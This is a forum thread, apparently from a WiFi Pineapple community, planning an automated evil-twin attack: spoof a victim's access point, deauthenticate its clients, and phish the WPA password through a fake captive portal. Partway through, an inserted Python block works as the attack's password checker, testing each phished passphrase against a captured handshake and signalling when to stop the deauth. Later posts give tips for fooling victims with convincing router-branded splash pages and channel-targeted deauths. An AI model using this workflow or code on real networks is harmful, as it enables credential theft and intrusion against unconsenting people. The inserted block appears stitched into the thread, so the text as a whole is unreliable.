<IDEA> Infusion Idea


cheeto


Hey guys, here's my infusion idea.


It's based on "linset".


The objective is to get any Wi-Fi password (WPA/WPA2, etc.).


Today, this can be done with Evil Portal. It works as long as the splash screen is convincing.

But why not go further?


The first step is to select the target AP and spoof the BSSID name.

2nd, deauth the target's AP.

Once the client connects to the MKV (Evil Portal) and enters the Wi-Fi password, the MKV will TEST the password on the victim's AP.

If the password is correct, then the password is saved and both Evil Portal and deauth are shut off. If the Wi-Fi password entered by the client is incorrect, they'll be prompted to re-enter the correct password.


This works great on LINSET; it would be groundbreaking if the MKV could do this too.


Cheers and thanks for reading.



Apart from a new infusion, this should also be easy enough to implement with a Portal Auth injection set, with some script to run on the "connect" button press to check the validity of the credentials provided, and Evil Portal.

I do like the idea though :)

Edited by DataHead

Apart from a new infusion, this should also be easy enough to implement with a Portal Auth injection set, with some script to run on the "connect" button press to check the validity of the credentials provided, and Evil Portal.

This is a really good idea for an injection set. I'll have to look into it after I complete the updates I'm already working on for Portal Auth and the Payloader injection set, unless someone else wants to work on it. After all, the modularity of injection sets was intentionally designed so others could create and share.

Edited by sud0nick

In theory, this would very much work as an injection set for Portal Auth, as we can launch scripts with the injection set. The only thing that differs in the video is that it captures a handshake (or half handshake) between the client and the target AP, and checks the captured password credential in aircrack against said handshake. That would also be possible with the Pineapple, through the injection set script. This could also be made as a standalone infusion, but seeing that all things are in place and already made for this to be possible (aside from said injection set and script), I personally do not think a separate infusion needs to be made. Love the idea though. If I get enough free time I can look into this also.
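The check described in the post above (and step 3 of the original post) is, concretely, an offline test of the submitted passphrase against the captured 4-way handshake. The following is an added example of that check, not code from linset, aircrack-ng, Portal Auth or the Pineapple: it derives the WPA2 PMK and PTK from the submitted passphrase and compares the EAPOL-Key MIC on handshake message 2. The SSID, passphrase, MAC addresses, nonces and the handshake frame are all constructed in the file for the example; the only real reference value is the IEEE 802.11i Annex test vector for the PMK ("password" / "IEEE"). Only messages 1 and 2 are needed, which is why the "half handshake" mentioned above is enough.

```python
import hashlib
import hmac

# Added example, not code from linset, aircrack-ng or the Pineapple: performs the
# offline check the thread describes (test the passphrase the portal collected
# against a captured WPA2 handshake). Every frame, MAC, nonce and passphrase below
# is CONSTRUCTED for the example; nothing here is captured traffic.

# Byte offsets inside an EAPOL-Key frame (802.1X header + IEEE 802.11 key descriptor).
NONCE_OFFSET = 17   # 4 (802.1X hdr) + 1 (desc type) + 2 (key info) + 2 (key len) + 8 (replay ctr)
MIC_OFFSET = 81     # NONCE_OFFSET + 32 (nonce) + 16 (IV) + 8 (RSC) + 8 (key ID)
MIC_LEN = 16


def derive_pmk(passphrase: str, ssid: str) -> bytes:
    """WPA2-PSK: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def derive_ptk(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PRF-384: HMAC-SHA1 counter-mode expansion over the sorted MAC pair and nonce pair (CCMP)."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    out = b""
    for i in range(3):  # 3 x 20 bytes covers the 48 bytes needed
        out += hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]), hashlib.sha1).digest()
    return out[:48]  # KCK = out[:16], KEK = out[16:32], TK = out[32:48]


def eapol_mic(kck: bytes, frame: bytes) -> bytes:
    """Key descriptor version 2 (WPA2): HMAC-SHA1 over the frame with the MIC field zeroed, truncated to 16."""
    zeroed = frame[:MIC_OFFSET] + b"\x00" * MIC_LEN + frame[MIC_OFFSET + MIC_LEN:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:MIC_LEN]


def verify_passphrase(passphrase: str, ssid: str, ap_mac: bytes, client_mac: bytes,
                      anonce: bytes, msg2: bytes) -> bool:
    """True iff `passphrase` reproduces the MIC on handshake message 2.

    Message 1 (AP -> client) carries the ANonce; message 2 (client -> AP) carries the
    SNonce and the first MIC computed with the PTK, so a captured 1+2 "half handshake"
    is enough to test a candidate passphrase.
    """
    snonce = msg2[NONCE_OFFSET:NONCE_OFFSET + 32]
    kck = derive_ptk(derive_pmk(passphrase, ssid), ap_mac, client_mac, anonce, snonce)[:16]
    return hmac.compare_digest(eapol_mic(kck, msg2), msg2[MIC_OFFSET:MIC_OFFSET + MIC_LEN])


def build_msg2(kck: bytes, snonce: bytes, key_data: bytes = b"") -> bytes:
    """Construct a well-formed message 2 with a valid MIC (example input only; a real one is sniffed)."""
    body = (
        b"\x02"                   # descriptor type: RSN (WPA2)
        + b"\x01\x0a"             # key info: version 2 (HMAC-SHA1 MIC), pairwise, MIC bit set
        + b"\x00\x10"             # key length 16 (CCMP)
        + (1).to_bytes(8, "big")  # replay counter
        + snonce
        + b"\x00" * 16            # key IV
        + b"\x00" * 8             # key RSC
        + b"\x00" * 8             # key ID (reserved)
        + b"\x00" * MIC_LEN       # MIC placeholder, filled in below
        + len(key_data).to_bytes(2, "big")
        + key_data
    )
    frame = b"\x02\x03" + len(body).to_bytes(2, "big") + body  # 802.1X v2, type 3 = EAPOL-Key
    mic = eapol_mic(kck, frame)
    return frame[:MIC_OFFSET] + mic + frame[MIC_OFFSET + MIC_LEN:]


# --- constructed "victim" network and captured handshake (example data, not real) ---
SSID = "example-homenet"
REAL_PASSPHRASE = "correct horse battery staple"
AP_MAC = bytes.fromhex("020000000001")      # locally administered example addresses
CLIENT_MAC = bytes.fromhex("020000000002")
ANONCE = bytes(range(32))                   # would come from message 1
SNONCE = bytes(range(32, 64))               # would come from message 2


def constructed_msg2() -> bytes:
    """Build the example capture: message 2 as the real client would have sent it."""
    kck = derive_ptk(derive_pmk(REAL_PASSPHRASE, SSID), AP_MAC, CLIENT_MAC, ANONCE, SNONCE)[:16]
    return build_msg2(kck, SNONCE)


def portal_check(candidates):
    """The portal loop from the thread: test each submission; return the first that verifies, else None."""
    msg2 = constructed_msg2()
    for submitted in candidates:
        if verify_passphrase(submitted, SSID, AP_MAC, CLIENT_MAC, ANONCE, msg2):
            return submitted   # correct: stop the deauth and the spoofed AP
    return None                # every submission was wrong: keep prompting


if __name__ == "__main__":
    print(portal_check(["password123", "hunter2", REAL_PASSPHRASE]))
```

In a real deployment the SSID, both MACs, the ANonce and message 2 come from the sniffed capture (aircrack-ng does the same derivation when you point it at a pcap and a wordlist); the `compare_digest` keeps the MIC comparison constant-time, which matters little here but is the habit to keep.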


I think the MKV version of this could actually be better, for one reason: Linset does not allow you to customize the splash screen. We all know we can make our own splash screen on the MKV.

I agree the MKV has a lot of the tools needed to get this to work. The biggest challenge will be making the script that will collect the Wi-Fi password and test it on the victim's AP.

If the password is correct, then shut down the deauth and BSSID spoof; if the password is incorrect, then continue deauthing and spoofing the victim's AP.

I know nothing about programming, but I'm more than willing to test whatever you guys need testing.

cheers!!


The first step is to select the target AP and spoof the BSSID name.
2nd, deauth the target's AP.
Once the client connects to the MKV (Evil Portal) and enters the Wi-Fi password, the MKV will TEST the password on the victim's AP.

Not to rain on your parade, but you are missing some key steps between 2 and the rest of it.

The victim will notice that they are being repeatedly disconnected from their Wi-Fi, and if they are competent enough to check the list of available networks they will notice there are two networks with their home SSID name and one of them is listed as being an open network. If they connect, you are counting on them not to be intimidated by a router screen, and you assume they know their WPA password.

This technique requires the victim has the right mix of competence and incompetence, and it has a high degree of detection.


The average user doesn't know the difference between WEP and WPA.

Anyway, I have tested this theory many times and it works 88% of the time.

It all boils down to the splash screen. It has to look very real. Before pentesting a target, it's important to check out the router brand or even the ISP. All of this is possible and will come in handy when making a convincing splash screen.

Another important measure is to zero in on the victim's channel. This way, when you deauth the target, you will only deauth a specific BSSID (no channel scanning). This sometimes makes the target BSSID disappear, so the only option is to log onto the MKV.

My suggestion is simply to automate this rather than having to check to see if you picked up a credential. The MKV has the capability to do this, but it needs to be strung together into one infusion and automated.

